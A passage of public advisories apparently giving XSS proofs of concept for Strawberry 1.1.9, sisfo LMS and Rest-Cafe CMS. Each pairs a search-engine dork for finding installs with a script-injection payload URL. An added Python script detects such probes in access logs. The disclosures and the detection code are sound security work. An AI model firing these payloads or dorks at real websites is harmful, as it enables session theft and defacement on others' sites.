[XSS Payload] in "Comment"<br />6. Submit<br /><br />7. XSS Fired on Local Browser<br /><br />8. XSS will Fire & Execute in the Visitor's Browser when they visit the page of the Property you [Inject] the XSS Payloads in, & XSS will also Fire on the [Reviews Page]<br /><br /><br />Note: I think the Administration Panel is missing a section to Manage [Reviews] on the website;<br /> this feature must be added in the next Updates [View/Edit/Delete]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Strawberry 1.1.9 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : https://cutenewsru.sourceforge.io/strawberry/ | <br />| # Dork : "Powered by Strawberry 1.1.9" |<br />====================================================================================================================================<br /><br />PoC :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"<br /><br />[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : sisfo Sistem Informasi Akademik lms v1.9.3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://unisma.ac.id/ | <br />| # Dork : inurl:mnux?=login |<br />====================================================================================================================================<br /><br />PoC :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : /?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik'"()%26%25<acx><ScRiPt >prompt(/indoushka/)</ScRiPt><br /><br />[+] https://127.0.0.1/siakad.stpi-pajak.ac.id/?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Rest-Cafe and Restaurant Website CMS 2.0.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.1(64-bit) | <br />| # Vendor : https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 | <br />| # Dork : "news.php?slug=" |<br />====================================================================================================================================<br /><br />PoC :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : /news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3E<br /><br />[+] http://127.0.0.1/cms/news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3E<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
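The reflected-XSS probes catalogued in the advisories above (Sales of Cashier Goods, Inout Search Engine, Strawberry, sisfo, Rest-Cafe) all travel in the request target, so a defender can spot them in ordinary web-server access logs. The detection below is an added example, not code from any of the advisories; the log lines are constructed from the advisories' URLs with placeholder client addresses, and the decode-until-stable step is what exposes the double-encoded %2520 form used against sisfo.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines (placeholder client IPs).
# The request targets are the ones the advisories on this page use, plus
# two benign requests that must not be flagged.
ACCESS_LOG = r"""
203.0.113.10 - - [01/Jul/2023:10:00:01 +0000] "GET /print.php?nm_member=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.11 - - [01/Jul/2023:10:00:02 +0000] "GET /index.php?page=index%2findexl7fex%3cimg%20src%3da%20onerror%3dalert(1)%3ed392j&type=Web HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.12 - - [01/Jul/2023:10:00:03 +0000] "GET /content/index.php/%22onmouseover%3d'prompt(document.cookies)'bad%3d%22 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.13 - - [01/Jul/2023:10:00:04 +0000] "GET /?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.14 - - [01/Jul/2023:10:00:05 +0000] "GET /cms/news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.15 - - [01/Jul/2023:10:00:06 +0000] "GET /index.php?page=search&q=1%3C2+%26+only%3Dtrue HTTP/1.1" 200 1000 "-" "Mozilla/5.0"
"""

_REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Markup that has no business in a request target: a tag name right after
# "<" (any case, so <ScRiPt > counts), an inline event handler whose value
# is a function call (so "only=true" is not a handler), or a javascript: URL.
_MARKUP = re.compile(
    r"<\s*/?\s*[a-z][a-z0-9]*[\s>/]"
    r"|\bon[a-z]+\s*=\s*['\"]?\s*[a-z_$.]+\s*\("
    r"|javascript\s*:",
    re.IGNORECASE,
)


def decode_target(target: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so %2520 -> %20 -> ' ' is seen in full."""
    current = target
    for _ in range(rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def find_xss_probes(log_text: str) -> list:
    """Return (client_ip, decoded_target, matched_fragment) per suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = _REQUEST_LINE.search(line)
        if not m:
            continue
        decoded = decode_target(m.group("target"))
        hit = _MARKUP.search(decoded)
        if hit:
            hits.append((line.split(" ", 1)[0], decoded, hit.group(0)))
    return hits


if __name__ == "__main__":
    for ip, target, fragment in find_xss_probes(ACCESS_LOG):
        print(f"{ip}  matched {fragment!r}  in {target}")
```

Heuristics like this catch the probes a scanner or a copied advisory produces, not an encoder-aware attacker; they belong in alerting alongside the real fix, which is output encoding in the application.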